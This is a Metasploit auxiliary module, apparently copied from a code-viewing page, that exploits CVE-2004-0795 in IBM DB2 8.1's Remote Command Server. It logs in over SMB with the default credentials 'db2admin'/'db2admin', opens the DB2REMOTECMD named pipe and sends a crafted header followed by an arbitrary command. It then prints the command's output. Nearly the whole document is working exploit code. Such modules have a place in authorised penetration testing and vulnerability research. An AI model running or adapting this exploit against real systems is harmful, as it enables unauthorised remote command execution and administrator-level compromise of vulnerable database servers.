Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::SMB::Client
8

9
  def initialize(info = {})
10
    super(update_info(info,
11
      'Name'           => 'IBM DB2 db2rcmd.exe Command Execution Vulnerability',
12
      'Description'    => %q{
13
          This module exploits a vulnerability in the Remote Command Server
14
          component in IBM's DB2 Universal Database 8.1. An authenticated
15
          attacker can send arbitrary commands to the DB2REMOTECMD named pipe
16
          which could lead to administrator privileges.
17
      },
18
      'Author'         => [ 'MC' ],
19
      'License'        => MSF_LICENSE,
20
      'References'     =>
21
        [
22
          [ 'CVE', '2004-0795' ],
23
          [ 'OSVDB', '4180' ],
24
          [ 'BID', '9821' ],
25
        ],
26
      'DisclosureDate' => '2004-03-04'))
27

28
      register_options(
29
        [
30
          OptString.new('CMD', [ true, 'The command to execute', 'ver']),
31
          OptString.new('SMBUser', [ true, 'The username to authenticate as', 'db2admin'], fallbacks: ['USERNAME']),
32
          OptString.new('SMBPass', [ true, 'The password for the specified username', 'db2admin'], fallbacks: ['PASSWORD']),
33
        ])
34

35
      deregister_options('SMB::ProtocolVersion')
36
  end
37

38
  def run
39

40
    print_status("Connecting to the server...")
41
    connect(versions: [1])
42

43
    print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")
44

45
    # Connect with a valid user/pass. if not, then bail.
46
    begin
47
      smb_login()
48
    rescue ::Exception => e
49
      print_error("Error: #{e}")
50
      disconnect
51
      return
52
    end
53

54
    # Have it so our command arg is convenient to call.
55
    rcmd = datastore['CMD']
56

57
    print_status("Connecting to named pipe \\DB2REMOTECMD...")
58

59
    # If the pipe doesn't exist, bail.
60
    begin
61
      pipe = simple.create_pipe('\\DB2REMOTECMD')
62
    rescue ::Exception => e
63
      print_error("Error: #{e}")
64
      disconnect
65
      return
66
    end
67

68
    # If we get this far, do the dance.
69

70
    fid = pipe.file_id
71

72
    # Need to make a Trans2 request with the param of 'QUERY_FILE_INFO' keeping our file_id
73
    trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
74

75
    # Write to the pipe, our command length comes into play.
76
    pipe.write([0x00000001].pack('V') + "DB2" + "\x00" * 525 + [rcmd.length].pack('V'))
77
    # Send off our command
78
    pipe.write(rcmd)
79

80
    # Read from the pipe and give us the data.
81
    res = pipe.read()
82
    print_line(res)
83

84
    # Close the named pipe and disconnect from the socket.
85
    pipe.close
86
    disconnect
87

88
  end
89
end
90

91